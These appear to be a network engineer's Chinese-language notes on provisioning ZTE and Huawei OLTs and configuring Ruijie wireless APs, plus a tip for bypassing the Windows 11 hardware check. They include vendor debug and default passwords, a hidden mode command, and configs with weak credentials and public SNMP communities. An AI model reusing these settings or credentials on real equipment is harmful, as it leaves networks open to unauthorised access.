——————-*******———————————– /*在OLT下配置ONU */

ZXAN(config)#interface epon-olt_0/3/3

ZXAN(config-if)#onu 1 type ZTE-F401 mac 0000.62ee.eeee

ZXAN(config-if)#show onu all-status epon-olt_0/3/3

ZXAN(config-if)#interface epon-olt 0/3/1

————————

onu 1 type ZTE-F401 mac 0000.C000.0001

onu 2 type ZTE-F401 mac 0000.C000.0002

onu 3 type ZTE-F401 mac 0000.C000.0003

onu 4 type ZTE-F401 mac 0000.C000.0004

ZXAN(config-if)#exit

######### 配置 ONU ###############

******************** onu 1 *********************

ZXAN(config)#interface epon-onu_0/3/1:1

ZXAN(config-if)#activate#激活#

ZXAN(config-if)#authentication enable#开启认证#

ZXAN(config-if)#no bandwidth-profile

ZXAN(config-if)#bandwidth-profile 28 # #绑定 bandwidth-profile ##

ZXAN(config-if)#switchport mode hybrid #配置pon 口vlan 这是配置olt上的不会下发onu#

ZXAN(config-if)#no switchport default vlan

ZXAN(config-if)#switchport default vlan 528

ZXAN(config-if)#switchport vlan 100-110 tag

ZXAN(config-if)#encrypt direction downstream disable#关闭下行方向三重搅动 /可选/ #

ZXAN(config-if)#exit

########## ONU端 VLAN mode #################

pon-onu-mng epon-onu_0/3/1:2

vlan port eth_0/1 mode transparent

exit

**************** onu 2 *************************

interface epon-onu_0/3/1:2

activate

authentication enable

enable

encrypt direction downstream disable

bandwidth-profile 28

switchport mode hybrid

switch default vlan 528

switch vlan 500-527 tag

switchport vlan 4000-4096 tag

exit

pon-onu-mng epon-onu_0/3/1:2

vlan port eth_0/1 mode transparent

exit

************************ onu 3 *************************

interface epon-onu_0/3/1:3

activate

authentication enable

enable

encrypt direction downstream disable

bandwidth-profile 28

switchport mode hybrid

switchport default vlan 528

switchport vlan 500-527 tag

switchport vlan 4000-4096 tag

exit

pon-onu-mng epon-onu_0/3/1:3

vlan port eth_0/1 mode transparent

exit

********************* onu 4 ***************************

interface epon-onu_0/3/1:4

activate

authentication enable

enable

encrypt direction downstream disable

bandwidth-profile 28

switchport mode hybrid

switchport default vlan 528

switchport vlan 500-527 tag

switchport vlan 4000-4094 tag

exit

pon-onu-mng epon-onu_0/3/1:4

vlan port eth_0/1 mode transpanent

exit

*********************************************************

############配置 onu classification ################

ZXAN(epon-onu-mng)#

———————————smac based————————

classification rule-profile 5 queue 3 priority 1

classification rule-profile 6 queue 2 priority 2

classification rule-profile 7 queue 1 priority 3

classification rule-profile 8 queue 0 priority 4

classification condition-profile 15 smac 0000.0000.00a1 operation-type equal

classification condition-profile 16 smac 0000.0000.00a2 operation-type equal

classification condition-profile 17 smac 0000.0000.00a3 operation-type equal

classification condition-profile 18 smac 0000.0000.00a4 operation-type equal

classification port eth_0/1 rule-precedence 5 add 5 15

classification port eth_0/1 rule-precedence 6 add 6 16

classification port eth_0/1 rule-precedence 7 add 7 17

classification port eth_0/1 rule-precedence 8 add 8 18

————————–vlanid based————————-

classification rule-profile 5 queue 3 priority 1

classification rule-profile 6 queue 2 priority 2

classification rule-profile 7 queue 1 priority 3

classification rule-profile 8 queue 0 priority 4

classification condition-profile 15 vlanId 501 operation-type equal

classification condition-profile 16 vlanId 502 operation-type equal

classification condition-profile 17 vlanId 503 operation-type equal

classification condition-profile 18 vlanId 504 operation-type equal

classification port eth_0/1 rule-precedence 5 add 5 15

classification port eth_0/1 rule-precedence 6 add 6 16

classification port eth_0/1 rule-precedence 7 add 7 17

classification port eth_0/1 rule-precedence 8 add 8 18

———————priority based—————————-

classification rule-profile 5 queue 3 priority 1

classification rule-profile 6 queue 2 priority 2

classification rule-profile 7 queue 1 priority 3

classification rule-profile 8 queue 0 priority 4

classification condition-profile 15 priority 1 operation-type equal

classification condition-profile 16 priority 2 operation-type equal

classification condition-profile 17 priority 3 operation-type equal

classification condition-profile 18 priority 4 operation-type equal

classification port eth_0/1 rule-precedence 5 add 5 15

classification port eth_0/1 rule-precedence 6 add 6 16

classification port eth_0/1 rule-precedence 7 add 7 17

classification port eth_0/1 rule-precedence 8 add 8 18

—————————src IP based————————————

classification rule-profile 5 queue 3 priority 1

classification rule-profile 6 queue 2 priority 2

classification rule-profile 7 queue 1 priority 3

classification rule-profile 8 queue 0 priority 4

classification condition-profile 15 srcIp 192.168.1.1 operation-type equal

classification condition-profile 16 srcIp 192.168.1.1 operation-type equal

classification condition-profile 17 srcIp 192.168.1.3 operation-type equal

classification condition-profile 18 srcIp 192.168.1.4 operation-type equal

classification port eth_0/1 rule-precedence 5 add 5 15

classification port eth_0/1 rule-precedence 6 add 6 16

classification port eth_0/1 rule-precedence 7 add 7 17

classification port eth_0/1 rule-precedence 8 add 8 18

———————dstIP based———————————-

classification rule-profile 5 queue 3 priority 1

classification rule-profile 6 queue 2 priority 2

classification rule-profile 7 queue 1 priority 3

classification rule-profile 8 queue 0 priority 4

classification condition-profile 15 dstIp 192.168.1.1 operation-type equal

classification condition-profile 16 dstIp 192.168.1.1 operation-type equal

classification condition-profile 17 dstIp 192.168.1.3 operation-type equal

classification condition-profile 18 dstIp 192.168.1.4 operation-type equal

classification port eth_0/1 rule-precedence 5 add 5 15

classification port eth_0/1 rule-precedence 6 add 6 16

classification port eth_0/1 rule-precedence 7 add 7 17

classification port eth_0/1 rule-precedence 8 add 8 18

———————dscp based———————————–

classification rule-profile 5 queue 3 priority 1

classification rule-profile 6 queue 2 priority 2

classification rule-profile 7 queue 1 priority 3

classification rule-profile 8 queue 0 priority 4

classification condition-profile 15 dscp 1 operation-type equal

classification condition-profile 16 dscp 2 operation-type equal

classification condition-profile 17 dscp 3 operation-type equal

classification condition-profile 18 dscp 4 operation-type equal

classification port eth_0/1 rule-precedence 5 add 5 15

classification port eth_0/1 rule-precedence 6 add 6 16

classification port eth_0/1 rule-precedence 7 add 7 17

classification port eth_0/1 rule-precedence 8 add 8 18

————————————————————————

ZXAN(epon-onu-mng)#interface eth eth_0/1 auto-neg #onu uni 1 auto-negotiate

ZXAN(epon-onu-mng)#interface eth eth_0/1 flow-control

ZXAN(epon-onu-mng)#interface eth eth_0/1 phy-state #physical port state

ZXAN(epon-onu-mng)#interface eth eth_0/1 policing #Ingress policing

ZXAN(epon-onu-mng)#fastleave #enable/disable fastleave

ZXAN(epon-onu-mng)#fec #enable/disble fec

##### 配置onu multicast ########

ZXAN(epon-onu-mng)#multicast vlan port eth_0/1 add vlanlist 4000 #add mvlan

ZXAN(epon-onu-mng)#multicast vlan port eth_0/1 delete vlanlist 4000 #del mvlan

ZXAN(epon-onu-mng)#multicast vlan port eth_0/1 clear #clear mvlan

ZXAN(epon-onu-mng)#multicast group-max-number eth_0/1 32 #config max group

ZXAN(epon-onu-mng)#multicast switch igmpsnooping # multicast snooping mode

ZXAN(epon-onu-mng)#multicast switch control-multicast # multicast CTC mode

ZXAN(epon-onu-mng)#multicast control-type gda-ip-and-vlan #组播控制类型切换

#### holdover 开关 ###########

ZXAN(epon-onu-mng)#holdover disable/enable

清除配置

ZXAN(config-if)# no onu id# <1-64> onu id #

2022-03-21

华为ma5680t OLT开局配置 Gpon

第一步：添加一个用户

MA5680T>enable //打开特权EXEC

MA5680T#config //进入终端配置模式

MA5680T(config)#sysname SJZ-HW-OLT-1 //设备命名 (一般为开局配置)

MA5680T (config) #terminal user name //添加操作用户huawei

User Name(length<6,15>):huawei //设置用户名

User Password(length<6,15>):huawei123 //要求输入密码

Confirm Password(length<6,15>): huawei123 //要求再次确认一遍密码

User profile name(<=15 chars)[root]:root //输入用户管理级别

User’s Level:

Common User 2. Operator 3. Administrator:3 //选择用户权限

Permitted Reenter Number(0–4):4 //设置此用户名可重复登录次数，一般选择4

User’s Appended Info(<=30 chars):HuaweiAdm //添加描述，可不设置。

Adding user succeeds

Repeat this operation? (y/n)[n]:（是否重复操作，N）

第二步：创建DBA（Dynamically Bandwidth Assignment动态带宽分配）模版

类型(type)分为5种，分别是type1,type2,type3,type4,type5.其中：

//type1 为固定带宽模式；

//type2 为保证带宽模式；

//type3 为保证带宽的同时设置最大带宽值；

//type4 为仅设定最大带宽模式；

//type5 为3种模式的综合，即设置最大带宽，在保证带宽的同时采用固定带宽模式。

下面创建两个DBA模版

dba-profile add profile-id10type4 max 307200 （保证300M带宽）

dba-profile add profile-id 512 type2 assure 10240（保证10M带宽）

第三步：创建链路模版，OUN模版

MA5680T(config)#ont-lineprofile gpon profile-id10//建链路模版，并且绑定DBA模版10

tcont 0 dba-profile-id 512 绑定t-cont与DBA模版

tcont 1 dba-profile-id 10 TCONT 1 绑定DBA为10模版

tcont 2 dba-profile-id 10

tcont 3 dba-profile-id 10

tcont 4 dba-profile-id 10

gem add 0 eth tcont 0 建立GEM port，绑定相应的TCONT通道

gem add 1 eth tcont 1 //gem port 1 绑定TCONT 1

gem add 2 eth tcont 1 //gem port 2 绑定TCONT 1

gem add 3 eth tcont 1

gem add 4 eth tcont 1

gem mapping 0 0 vlan 888建立GEM Port端口映射，这里使用索引号与vlan映射。

gem mapping 1 0 vlan 101 //gemport 1 的第0个索引号与vlan101映射

gem mapping 2 0 vlan 102 // gemport 2 的第0个索引号与vlan102映射

gem mapping 3 0 vlan 103

gem mapping 4 0 vlan 104

commit （提交，保存）

第四步：创建业务模版

ont-srvprofile gpon profile-id 10

ont-port pots 2 eth 4 ONT的能力，支持4个eth和2个pots口(pots：模拟电话业务)

commit

//ont-srvprofile gpon profile-id 20 （个人理解是多余的,在这里可以不用配）

//ont-port pots 2 eth 4 ONT的能力，支持4个eth和2个pots口

//commit

第五步：创建oun业务

interface gpon 0/1

port 0 ont-auto-find enable

port 1 ont-auto-find enable

port 2 ont-auto-find enable

port 3 ont-auto-find enable

port 4 ont-auto-find enable

port 5 ont-auto-find enable

port 6 ont-auto-find enable

port 7 ont-auto-find enable

查看自动发现的oun，取其SN码（MA5680T(config-if-gpon-0/1)#display ont autofind 0 ）

ont add0 0sn-auth0000000000000000snmp ont-lineprofile-id10

ont ipconfig 0 0（前面的0表示gpon0/1/0，后面的0表示ont 的id：0）static ip-address 172.17.0.1 mask 255.255.0.0 vlan 888 priority 0 gateway 172.17.0.253 pri-dns 172.17.0.254 slave-dns 172.17.0.253

第六步：创建业务虚端口

huawei(config)# service-port vlan 1001 epon 0/1/0 ont 0（0是对应光猫的编号）

gemport 1 (1是对应vlan 101 102 885的编号) multi-service user-vlan 101 \\配置网

service-port 0 vlan 888 gpon 0/1/0 ont 8 gemport 0 multi-service user-vlan 888

tag-transform translate

service-port 1 vlan 1001 gpon 0/1/0 ont 8 gemport 1 multi-service user-vlan 101

tag-transform translate-and-add inner-vlan 101 inner-priority 0

service-port 2 vlan 888 gpon 0/1/0 ont 0 gemport 0 multi-service user-vlan 888

tag-transform translate

service-port 3 vlan 888 gpon 0/1/0 ont 1 gemport 0 multi-service user-vlan 888

tag-transform translate

service-port 4 vlan 888 gpon 0/1/0 ont 2 gemport 0 multi-service user-vlan 888

tag-transform translate

service-port 5 vlan 888 gpon 0/1/0 ont 3 gemport 0 multi-service user-vlan 888

tag-transform translate

service-port 6 vlan 888 gpon 0/1/0 ont 4 gemport 0 multi-service user-vlan 888

tag-transform translate

service-port 7 vlan 888 gpon 0/1/0 ont 5 gemport 0 multi-service user-vlan 888

tag-transform translate

service-port 8 vlan 888 gpon 0/1/0 ont 6 gemport 0 multi-service user-vlan 888

tag-transform translate

service-port 9 vlan 888 gpon 0/1/0 ont 7 gemport 0 multi-service user-vlan 888

tag-transform translate

service-port 10 vlan 888 gpon 0/1/1 ont 0 gemport 0 multi-service user-vlan 888

tag-transform translate

service-port 11 vlan 888 gpon 0/1/1 ont 1 gemport 0 multi-service user-vlan 888

tag-transform translate

service-port 12 vlan 888 gpon 0/1/1 ont 2 gemport 0 multi-service user-vlan 888

tag-transform translate

service-port 13 vlan 888 gpon 0/1/1 ont 3 gemport 0 multi-service user-vlan 888

tag-transform translate

service-port 14 vlan 888 gpon 0/1/1 ont 4 gemport 0 multi-service user-vlan 888

tag-transform translate

service-port 15 vlan 888 gpon 0/1/1 ont 5 gemport 0 multi-service user-vlan 888

tag-transform translate

service-port 16 vlan 888 gpon 0/1/1 ont 6 gemport 0 multi-service user-vlan 888

tag-transform translate

service-port 17 vlan 888 gpon 0/1/1 ont 7 gemport 0 multi-service user-vlan 888

tag-transform translate

service-port 18 vlan 1001 gpon 0/1/0 ont 1 gemport 1 multi-service user-vlan

101 tag-transform translate-and-add inner-vlan 102 inner-priority 0

service-port 19 vlan 1001 gpon 0/1/0 ont 2 gemport 1 multi-service user-vlan

101 tag-transform translate-and-add inner-vlan 103 inner-priority 0

service-port 20 vlan 1001 gpon 0/1/0 ont 3 gemport 1 multi-service user-vlan

101 tag-transform translate-and-add inner-vlan 104 inner-priority 0

service-port 21 vlan 1001 gpon 0/1/0 ont 4 gemport 1 multi-service user-vlan

101 tag-transform translate-and-add inner-vlan 105 inner-priority 0

service-port 22 vlan 1001 gpon 0/1/0 ont 5 gemport 1 multi-service user-vlan

101 tag-transform translate-and-add inner-vlan 106 inner-priority 0

service-port 23 vlan 1001 gpon 0/1/0 ont 6 gemport 1 multi-service user-vlan

101 tag-transform translate-and-add inner-vlan 107 inner-priority 0

service-port 24 vlan 1001 gpon 0/1/0 ont 7 gemport 1 multi-service user-vlan

101 tag-transform translate-and-add inner-vlan 108 inner-priority 0

service-port 25 vlan 1001 gpon 0/1/1 ont 0 gemport 1 multi-service user-vlan

101 tag-transform translate-and-add inner-vlan 109 inner-priority 0

service-port 26 vlan 1001 gpon 0/1/1 ont 1 gemport 1 multi-service user-vlan

101 tag-transform translate-and-add inner-vlan 110 inner-priority 0

service-port 27 vlan 1001 gpon 0/1/1 ont 2 gemport 1 multi-service user-vlan

101 tag-transform translate-and-add inner-vlan 111 inner-priority 0

service-port 28 vlan 1001 gpon 0/1/1 ont 3 gemport 1 multi-service user-vlan

101 tag-transform translate-and-add inner-vlan 112 inner-priority 0

service-port 29 vlan 1001 gpon 0/1/1 ont 4 gemport 1 multi-service user-vlan

101 tag-transform translate-and-add inner-vlan 113 inner-priority 0

service-port 30 vlan 1001 gpon 0/1/1 ont 5 gemport 1 multi-service user-vlan

101 tag-transform translate-and-add inner-vlan 114 inner-priority 0

service-port 31 vlan 1001 gpon 0/1/1 ont 6 gemport 1 multi-service user-vlan

101 tag-transform translate-and-add inner-vlan 115 inner-priority 0

service-port 32 vlan 1001 gpon 0/1/1 ont 7 gemport 1 multi-service user-vlan

101 tag-transform translate-and-add inner-vlan 116 inner-priority 0

service-port 33 vlan 888 gpon 0/1/1 ont 8 gemport 0 multi-service user-vlan 888

tag-transform translate

service-port 34 vlan 1001 gpon 0/1/1 ont 8 gemport 1 multi-service user-vlan

101 tag-transform translate-and-add inner-vlan 117 inner-priority 0

service-port 35 vlan 1015 gpon 0/1/0 ont 0 gemport 3 multi-service user-vlan

103 tag-transform translate

service-port 36 vlan 1015 gpon 0/1/0 ont 1 gemport 3 multi-service user-vlan

103 tag-transform translate

service-port 37 vlan 1015 gpon 0/1/0 ont 2 gemport 3 multi-service user-vlan

103 tag-transform translate

service-port 38 vlan 1015 gpon 0/1/0 ont 3 gemport 3 multi-service user-vlan

103 tag-transform translate

service-port 39 vlan 1015 gpon 0/1/0 ont 4 gemport 3 multi-service user-vlan

103 tag-transform translate

service-port 40 vlan 1015 gpon 0/1/0 ont 5 gemport 3 multi-service user-vlan

103 tag-transform translate

service-port 41 vlan 1015 gpon 0/1/0 ont 6 gemport 3 multi-service user-vlan

103 tag-transform translate

service-port 42 vlan 1015 gpon 0/1/0 ont 7 gemport 3 multi-service user-vlan

103 tag-transform translate

service-port 43 vlan 1015 gpon 0/1/0 ont 8 gemport 3 multi-service user-vlan

103 tag-transform translate

service-port 44 vlan 1015 gpon 0/1/1 ont 0 gemport 3 multi-service user-vlan

103 tag-transform translate

service-port 45 vlan 1015 gpon 0/1/1 ont 1 gemport 3 multi-service user-vlan

103 tag-transform translate

service-port 46 vlan 1015 gpon 0/1/1 ont 2 gemport 3 multi-service user-vlan

103 tag-transform translate

service-port 47 vlan 1015 gpon 0/1/1 ont 3 gemport 3 multi-service user-vlan

103 tag-transform translate

service-port 48 vlan 1015 gpon 0/1/1 ont 4 gemport 3 multi-service user-vlan

103 tag-transform translate

service-port 49 vlan 1015 gpon 0/1/1 ont 5 gemport 3 multi-service user-vlan

103 tag-transform translate

service-port 50 vlan 1015 gpon 0/1/1 ont 6 gemport 3 multi-service user-vlan

103 tag-transform translate

service-port 51 vlan 1015 gpon 0/1/1 ont 7 gemport 3 multi-service user-vlan

103 tag-transform translate

service-port 52 vlan 1015 gpon 0/1/1 ont 8 gemport 3 multi-service user-vlan

103 tag-transform translate

service-port 53 vlan 805 gpon 0/1/0 ont 0 gemport 2 multi-service user-vlan 102

tag-transform translate

service-port 54 vlan 806 gpon 0/1/0 ont 1 gemport 2 multi-service user-vlan 102

tag-transform translate

service-port 55 vlan 807 gpon 0/1/0 ont 2 gemport 2 multi-service user-vlan 102

tag-transform translate

service-port 56 vlan 808 gpon 0/1/0 ont 3 gemport 2 multi-service user-vlan 102

tag-transform translate

service-port 57 vlan 809 gpon 0/1/0 ont 4 gemport 2 multi-service user-vlan 102

tag-transform translate

service-port 58 vlan 810 gpon 0/1/0 ont 5 gemport 2 multi-service user-vlan 102

tag-transform translate

service-port 59 vlan 811 gpon 0/1/0 ont 6 gemport 2 multi-service user-vlan 102

tag-transform translate

service-port 60 vlan 812 gpon 0/1/0 ont 7 gemport 2 multi-service user-vlan 102

tag-transform translate

service-port 61 vlan 813 gpon 0/1/0 ont 8 gemport 2 multi-service user-vlan 102

tag-transform translate

service-port 62 vlan 814 gpon 0/1/1 ont 0 gemport 2 multi-service user-vlan 102

tag-transform translate

service-port 63 vlan 815 gpon 0/1/1 ont 1 gemport 2 multi-service user-vlan 102

tag-transform translate

service-port 64 vlan 816 gpon 0/1/1 ont 2 gemport 2 multi-service user-vlan 102

tag-transform translate

service-port 65 vlan 817 gpon 0/1/1 ont 3 gemport 2 multi-service user-vlan 102

tag-transform translate

service-port 66 vlan 818 gpon 0/1/1 ont 4 gemport 2 multi-service user-vlan 102

tag-transform translate

service-port 67 vlan 819 gpon 0/1/1 ont 5 gemport 2 multi-service user-vlan 102

tag-transform translate

service-port 68 vlan 820 gpon 0/1/1 ont 6 gemport 2 multi-service user-vlan 102

tag-transform translate

service-port 69 vlan 805 gpon 0/1/1 ont 7 gemport 2 multi-service user-vlan 102

tag-transform translate

service-port 70 vlan 806 gpon 0/1/1 ont 8 gemport 2 multi-service user-vlan 102

tag-transform translate

管vlan 100业务虚通道，ontid为0

2022-03-21

华为 MA5680T [EPON]简单开局

//登录，开启特权，进入设置，设置语言，显示所有单板，确认所有单板
enable

config

switch language-mode

disp board 0

board confirm 0

//设置系统名称，添加管理vlan并绑定到上联，添加管理地址

sysname ZM-MA5680T

vlan 199 standard

port vlan 199 0/20 0

interface vlanif 199

ip address 192.168.199.2 255.255.255.0

MA5680T(config-if-giu-0/20)#native-vlan 0 vlan 200\\加入vlan业务..待查….

//开通SNMP，和U2000对接，记得团体名称要一致哦

snmp-agent community read public

snmp-agent community write private

//好戏开始了！这才是重点

//开启ONT自动发现并增加上联业务vlan

interface epon 0/1

port 0 ont-auto-find enable

….

…

vlan 200-500 smart

port vlan 200-500 0/20 0

//配置DBA带宽

dba-profile add profile-id 10 profile-name speed type1 fix 102400

//配置线路模板并板顶DBA模板

ont-lineprofile epon profile-id 10

llid dba-profile-id 10

commit

quit

//配置ONT业务模板

ont-srvprofile epon profile-id 10

ont-port eth 4

#port vlan eth 1 200 //ont端口id和vlan id

commit

quit

//增加注册ONT并绑定线路模板和业务模板

ont add 0 0 mac-auth 001A-A998-4698 oam ont-lineprofile-id 10 ont-srvprofile-id 10//端口编号+ONT编号+MAC+认证方式+线路模板+业务模板

ont port native-vlan 0 0 eth 1 vlan 200 //增加ont物理端口vlan。端口号+ONT编号+物理编号+vlan

quit

service-port vlan 200 epon 0/1/0 ont 0 multi-service user-vlan 200

save

over

其他细节： 5680t默认出厂地址 10.11.104.2

disp board 0 显示所有单板并准备

board confirm 0 确认所有单板，如果没有确认需要修改参数，0指机框，0/2指0框2槽

删除ONU首先要删除虚拟业务，undo service-port epon 0/2/0 ont 0

然后进入相应接口再删除ONT，ont delete 0 0 ，删除端口0 编号0的ONT

*–*-*-*-*–*-*–*-*-*-*-*-*–*-*-*-*-

epon ont add 0 0 loid-auth slot-0-port-0-ont-0 always-on oam ont-lineprofile-id 10 ont-srvprofile-id 10

gpon ont add 0 0 loid-auth slot-2-port-0-ont-0 always-on omci ont-lineprofile-id 11 ont-srvprofile-id 11

——————————————–超实用的最简单的SFU设备配置方法——————————————

dba-profile add profile-id 10 profile-name “500M” type4 max 512000

ont-srvprofile gpon profile-id 10 profile-name “gpon_srv”

ont-port pots adaptive eth adaptive

commit

quit

ont-lineprofile gpon profile-id 10 profile-name “gpon_line”

qos-mode gem-car

tcont 1 dba-profile-id 10

commit

quit

ont add 0 sn-auth 4857544303C9EF36 omci ont-lineprofile-id 10 ont-srvprofile-id 10

service-port vlan 200 port 0/1/0 ont 0 eth 1 multi-service user-vlan untagged tag-transform default \\SFU普通猫

service-port vlan 200 port 0/1/0 ont 0 multi-service user-vlan 41 tag-transform translate \\HGU网关猫
————————————————
版权声明：本文为CSDN博主「fyfal」的原创文章，遵循CC 4.0 BY-SA版权协议，转载请附上原文出处链接及本声明。
原文链接：https://blog.csdn.net/fyfal/article/details/79231662

2022-03-21

Windows11系统安装小记

教大家最省事的绕过硬件检测，升级安装windows11方法

1.首先去官网下载windows11的镜像文件
官网地址：https://www.microsoft.com/zh-cn/software-download/windows11

2.下载完成后，首先断网
断网方法有两个一个是直接拔网线，；另一个是直接网络连接里面禁用

3.装载win11的ISO文件

4.打开setup运行安装程序

5.先点击“更改安装程序下载更新的方式

6.选择“不是现在”，先不要进行下一步

7.删除C:\$WINDOWS.~BT\Sources\appraiserres.dll文件

8.接下来返回到安装程序界面，不管啥CPU，有没有TPM2.0，直接绕开微软的硬件检测，都可以升级安装

2022-03-14

ruijie-Ap

version AP_RGOS 11.1(9)B1P18, Release(06201506)
fair-schedule
sntp interval 7200
sntp server cn.ntp.org.cn
sntp enable
wids
!
black-white-list
!
web-auth acct-update-interval 1
!
spectral
!
enable service web-server http
enable service web-server https
webmaster level 0 username admin password 7 04361c0b370d
no service password-encryption
!
clock timezone UTC +8 0
!
dot11 wlan 1
band-select enable
ssid ruijie-wifi
ssid-code utf-8
!
link-check disable
!
nfpp
!
wlocation
!
vlan 1
name ap#outsideNetwork
!
interface GigabitEthernet 0/1
encapsulation dot1Q 1
!
interface GigabitEthernet 0/2
encapsulation dot1Q 1
!
interface Dot11radio 1/0
country-code CN
radio-type 802.11b
no ampdu-rts
sta-limit 24
rate-set 11b mandatory 1 2 5 11
rate-set 11g mandatory 1 2 5 11
rate-set 11g support 6 9 12 18 24 36 48 54
rate-set 11n mcs-support 15
rate-set 11ac mcs-support 19
no 11acsupport enable
channel 1
chan-width 40
station-role root-ap
!
interface Dot11radio 1/0.1
encapsulation dot1Q 1
wlan-id 1
!
interface Dot11radio 2/0
country-code CN
no short-preamble
radio-type 802.11a
mu-mimo enable
no ampdu-rts
rate-set 11a mandatory 6 12 24
rate-set 11a support 9 18 36 48 54
rate-set 11n mcs-support 15
rate-set 11ac mcs-support 19
11acsupport enable
channel 36
chan-width 20
station-role root-ap
!
interface Dot11radio 2/0.1
encapsulation dot1Q 1
wlan-id 1
!
interface Dot11radio 3/0
country-code CN
no short-preamble
radio-type 802.11a
mu-mimo enable
no ampdu-rts
rate-set 11a mandatory 6 12 24
rate-set 11a support 9 18 36 48 54
rate-set 11n mcs-support 15
rate-set 11ac mcs-support 19
11acsupport enable
channel 149
chan-width 20
station-role root-ap
!
interface Dot11radio 3/0.1
encapsulation dot1Q 1
wlan-id 1
!
interface BVI 1
ip address dhcp
!
wlansec 1
security rsn enable
security rsn ciphers aes enable
security rsn akm psk enable
security rsn akm psk set-key ascii 88888888
security wpa enable
security wpa ciphers aes enable
security wpa akm psk enable
security wpa akm psk set-key ascii 88888888
!
no offline-detect
!
line console 0
login
password admin
line vty 0 4
privilege level 15
login
password admin
!
end

2022-03-142022-03-14

锐捷 Fat/Fit Ap切换

配置成瘦AP的方法。

使用console口连接，baudrate rate: 9600, 8n1

瘦AP：console密码是ruijie，enable密码是apdebug

胖AP：console密码是admin，没有默认enable密码。

瘦（fit）AP转换为胖(fat)AP

Ruijie>ap-mode fat（隐藏命令）

胖（fat）AP转换为瘦(fit)AP

Ruijie#config terminal

Ruijie（config）#ap-mode fit

User Access Verification

Password:

Ruijie>enable

Password:

Ruijie#ap-m ?
  fat  Fat mode
  fit  Fit mode

Ruijie#ap-m fit
apmode will change to FIT.

Ruijie#show ap-m 
current mode: fit

Ruijie#show ip ?
  arp         Show IP ARP
  interface   IP interface status and configuration
  packet      IP packet
  raw-socket  Show raw socket
  ref         Show Ruijie Express Forward information
  route       IP routing table
  sockets     Show IPv4 sockets
  udp         Show UDP sockets

Ruijie#show ip interface
BVI 1
  IP interface state is: UP
  IP interface type is: BROADCAST
  IP interface MTU is: 1500
  IP address is: 
    192.168.110.1/24 (primary)
  IP address negotiate is: OFF
  Forward direct-broadcast is: OFF
  ICMP mask reply is: ON
  Send ICMP redirect is: ON
  Send ICMP unreachable is: ON
  DHCP relay is: OFF
  Fast switch is: ON
  Help address is: 
  Proxy ARP is: OFF
ARP packet input number: 0
  Request packet     : 0
  Reply packet       : 0
  Unknown packet     : 0
TTL invalid packet number: 0
ICMP packet input number: 0
 Echo request       : 0
 Echo reply         : 0
 Unreachable        : 0
＃退出
Ruijie#end
# 保存
Ruijie>write